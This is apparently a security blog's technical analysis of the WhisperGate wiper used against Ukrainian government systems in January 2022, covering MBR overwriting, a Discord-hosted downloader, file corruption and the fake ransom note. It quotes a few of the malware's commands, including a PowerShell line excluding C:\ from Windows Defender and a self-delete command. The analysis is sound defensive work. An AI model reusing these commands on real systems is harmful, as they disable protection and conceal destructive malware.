Wednesday, 26 January 2022

Analysis of WhisperGate


Summary of the attack

  • Name: WhisperGate

  • Discovered in January 2022

  • Used in a targeted attack against the Ukrainian government websites on the 14th of January, 2022

  • Overwrites the contents of files with the fixed number of bytes

  • Rewrites MBR, corrupts victims’ files, downloads and drops its own files

  • Corrupted files have a random 4-byte extension

  • Comes with 2 stages, PE64 written in C++ and .NET application with fake digital signatures

  • The third stage is .NET DLL, which is downloaded at runtime

                                                                                                by Denis Popov and Alexander Adamov


On January 13, 2022, multiple government sites in Ukraine were shut down due to a large-scale cyberattack by WhisperGate malware. In particular, the websites of the Cabinet of Ministers, the Ministry of Foreign Affairs, the Ministry of Sports, the Ministry of Energy, the Ministry of Agrarian Policy, the Ministry of Veterans Affairs, the website of the State Treasury, and state services website Diya stopped working. All users received a note with the following warning:

"Ukrainian! All your personal data has been uploaded to the public network. All data on the computer is destroyed, it is impossible to recover them. All information about you has become public, be afraid and expect the worst. This is for your past, present and future. For Volyn, for the OUN UPA, for Galicia, for Polissya, and for historical lands."

Microsoft intelligence named this activity "DEV-0586" and identified it as destructive malware that used to be ransomware. Its main purpose is to disrupt the system and damage files beyond the possibility of their recovery.

Technical Details

Deface of the government websites

Two types of deface attacks have been discovered by CERT-UA:

  • Complete replacement of the main page (index.php)
  • Injection of a malicious script to the website that replaces its content

The supposed attack vectors are:

  • supply chain attack
  • the exploitation of OctoberCMS and/or Log4j vulnerabilities
The traces of the commands executed by the attackers are shown below:

.bash_history (source:

MBR Writer (stage1.exe)

The threat actor uses Impacket tools collection to lateral movement and malware execution. The first file ‘stage1.exe’ is a PE64 executable written in C++ and compiled with the MinGW compiler.  This file can be placed in different directories, for example, C:\PerfLogs, C:\ProgramData, C:\, C:\temp. At the beginning of execution, malware obtains access to the ‘\\\\.\\PhysicalDrive0’, which contains the Master Boot Record (MBR). Then it writes the hardcoded ransom note to the MBR area as well as to every 199th sector of the disk. Since it was changed, after rebooting the system won’t be started, instead, the ransom note will be displayed.

The hardcoded ransom note:

Your hard drive has been corrupted.

In case you want to recover all hard drives

of your organization,

You should pay us $10k via bitcoin wallet

1AVNM68gj6PGPFcJuftKATa4WLnzg8fpfv and send message via

tox ID 8BEDC411012A33BA34F49130D0F186993C6A32DAD8976F6A5D82C1ED23054C057ECED5496F65

with your organization name.

We will contact you to give further instructions.

Obtaining access to the MBR and rewriting it 

This behavior isn’t typically used by ransomware whose main purpose is to encrypt files and demand a ransom to decrypt them, usually saving the system workability. In this case, malware changes the MBR, which causes the system not to start. This means that the ransom note is a fake and the main purpose of the malware is to disrupt systems operability.

The traces of stage1.exe execution discovered by CERT-UA are shown below:

stage1.exe execution (source:

 Trojan-Downloader (stage2.exe)

The second file ‘stage2.exe’ is a .NET application, which contains a Microsoft Windows signature supposedly taken from the Russian version of Windows Explorer according to the properties in File Details. Also, this file is obfuscated with Ezfuscator.

It’s used to download the File Corrupter and contains a hardcoded Discord link:

Download data from the hardcoded link

This file also contains a command, encoded in Base64 format: ‘UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==’, which will be given to the PowerShell with the ‘-enc’ parameter. This means that the PowerShell script will decode this string before execution. The decoded command is ‘Start-Sleep -s 10’. This command is used to suspend the activity for the specified period and used for the C2 server connection.

Executing the encoded PowerShell command

File Corrupter (Tbopbh.jpg / Frkmlkdkdubkznbkmcf.dll)

Downloaded Tbopbh.jpg file is a picture, which will be decoded to the Frkmlkdkdubkznbkmcf.dll (SHA256:923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6). This file is a .NET library and contains 3 resources:

Frkmlkdkdubkznbkmcf.dll loads resource ‘78c855a088924e92a7f60d661c3d1845’ and calls the decryption function.

Resource loading

The decryption function will decode this resource using the XOR operation. 

Decoding resource

During execution, the decoded resource drops two additional files in the %Temp% folder. The first file is ‘AdvansedRun.exe’ which will disable Windows Defender by executing the second file ‘Nmddfrqqrbyjeygggda.vbs’. This script contains a command that excludes the ‘C:\’ folder from Windows Defender scanning:

CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath 'C:\'", 0, False

Next, the malware drops ‘InstallUtil.exe’ to the ‘%Temp’ folder and executes it. This program is the Microsoft utility for installing server resources and has a valid digital signature.

InstallUtil.exe properties

During execution, this program writes 22.53GB of bytes on the disk. The original program doesn’t contain any suspicious code, so we can suppose that the WhisperGate injects malicious code in this process for file corruption.

The File Wiper corrupts the files with the following file extensions:


If the file extension matches one of these saved extensions, the contents of the file will be rewritten with 100000h (1048576 bytes) of the ‘0xC’ byte with appending a random 4-byte to its extension.

After the process of file corrupting is done, the malware executes ping command and deletes itself:

"cmd.exe /min /C ping -n 5 -w 10 > Nul & Del /f /q "%s"


All .NET files are obfuscated with Ezfuscator. Also, file ‘stage2.exe’ has a control flow and methods' name obfuscation.

Ransom note

The ransom note is written to the MBR (the very beginning of the bootable disk partition) and will be displayed on the screen when the system is rebooted.


The WhisperGate was used in the targeted attack against Ukrainian government websites in the middle of January 2022. This operation consists of two stages. At the first stage, the malware overwrites the MBR with the ransom note making the system not bootable and displaying the message with the ransom. At another one, the Trojan-Downloader downloads the malware that corrupts files overwriting its contents with a fixed number of bytes. Despite the fact that the malware broke the functionality and all the websites stopped working, they have been restored the next day.

Watch the recording of the lecture with WhisperGate analysis



File name
















Network indicators





MITRE attack techniques


  1. Lecture recording





No comments:

Post a Comment